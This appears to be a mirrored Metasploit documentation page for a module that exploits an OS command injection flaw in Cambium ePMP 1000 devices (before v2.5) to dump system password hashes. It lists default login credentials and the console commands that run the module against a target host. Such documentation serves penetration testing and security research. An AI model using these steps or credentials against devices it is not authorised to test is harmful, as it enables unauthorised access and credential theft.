Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/auxiliary/scanner/http/epmp1000_dump_hashes.md
Views: 11784
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials to dump system hashes:
admin/admin
installer/installer
home/home
Verification Steps
Do:
use auxiliary/scanner/http/epmp1000_dump_hashes
Do:
set RHOSTS [IP]
Do:
set RPORT [PORT]
Do:
run